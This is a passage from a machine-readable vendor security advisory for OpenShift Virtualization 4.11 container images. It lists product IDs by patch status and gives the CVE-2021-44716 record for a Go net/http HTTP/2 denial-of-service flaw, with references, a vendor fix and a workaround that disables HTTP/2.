"8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64", "8Base-CNV-4.11:container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64", "8Base-CNV-4.11:container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64", "8Base-CNV-4.11:container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64", "8Base-CNV-4.11:container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "golang: out-of-bounds read in golang.org/x/text/language leads to DoS", }, { cve: "CVE-2021-44716", cwe: { id: "CWE-400", name: "Uncontrolled Resource Consumption", }, discovery_date: "2021-12-09T00:00:00+00:00", flags: [ { label: "vulnerable_code_not_present", product_ids: [ "8Base-CNV-4.11:container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64", "8Base-CNV-4.11:container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64", "8Base-CNV-4.11:container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64", "8Base-CNV-4.11:container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64", "8Base-CNV-4.11:container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64", ], }, ], ids: [ { system_name: "Red Hat Bugzilla ID", text: "2030801", }, ], notes: [ { category: "description", text: "There's an uncontrolled resource consumption flaw in golang's net/http library in the canonicalHeader() function. An attacker who submits specially crafted requests to applications linked with net/http's http2 functionality could cause excessive resource consumption that could lead to a denial of service or otherwise impact to system performance and resources.", title: "Vulnerability description", }, { category: "summary", text: "golang: net/http: limit growth of header canonicalization cache", title: "Vulnerability summary", }, { category: "other", text: "For OpenShift Container Platform, OpenShift Virtualization, Red Hat Quay and OpenShift distributed tracing the most an attacker can possibly achieve by exploiting this vulnerability is to crash a container, temporarily impacting availability of one or more services. Therefore impact is rated Moderate.\n\nIn its default configuration, grafana as shipped in Red Hat Enterprise Linux 8 is not affected by this vulnerability. However, enabling http2 in /etc/grafana/grafana.ini explicitly would render grafana affected, therefore grafana has been marked affected.", title: "Statement", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-CNV-4.11:container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64", "8Base-CNV-4.11:container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64", "8Base-CNV-4.11:container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64", ], known_not_affected: [ "8Base-CNV-4.11:container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64", "8Base-CNV-4.11:container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64", "8Base-CNV-4.11:container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64", "8Base-CNV-4.11:container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64", "8Base-CNV-4.11:container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2021-44716", }, { category: "external", summary: "RHBZ#2030801", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2030801", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2021-44716", url: "https://www.cve.org/CVERecord?id=CVE-2021-44716", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2021-44716", url: "https://nvd.nist.gov/vuln/detail/CVE-2021-44716", }, { category: "external", summary: "https://groups.google.com/g/golang-announce/c/hcmEScgc00k", url: "https://groups.google.com/g/golang-announce/c/hcmEScgc00k", }, ], release_date: "2021-12-09T00:00:00+00:00", remediations: [ { category: "vendor_fix", date: "2022-09-14T19:28:51+00:00", details: "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-CNV-4.11:container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64", "8Base-CNV-4.11:container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64", "8Base-CNV-4.11:container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2022:6526", }, { category: "workaround", details: "This flaw can be mitigated by disabling HTTP/2. Setting the GODEBUG=http2server=0 environment variable before calling Serve will disable HTTP/2 unless it was manually configured through the golang.org/x/net/http2 package.", product_ids: [ "8Base-CNV-4.11:container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64", "8Base-CNV-4.11:container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64", "8Base-CNV-4.11:container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64", "8Base-CNV-4.11:container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64", "8Base-CNV-4.11:container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64", "8Base-CNV-4.11:container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64", 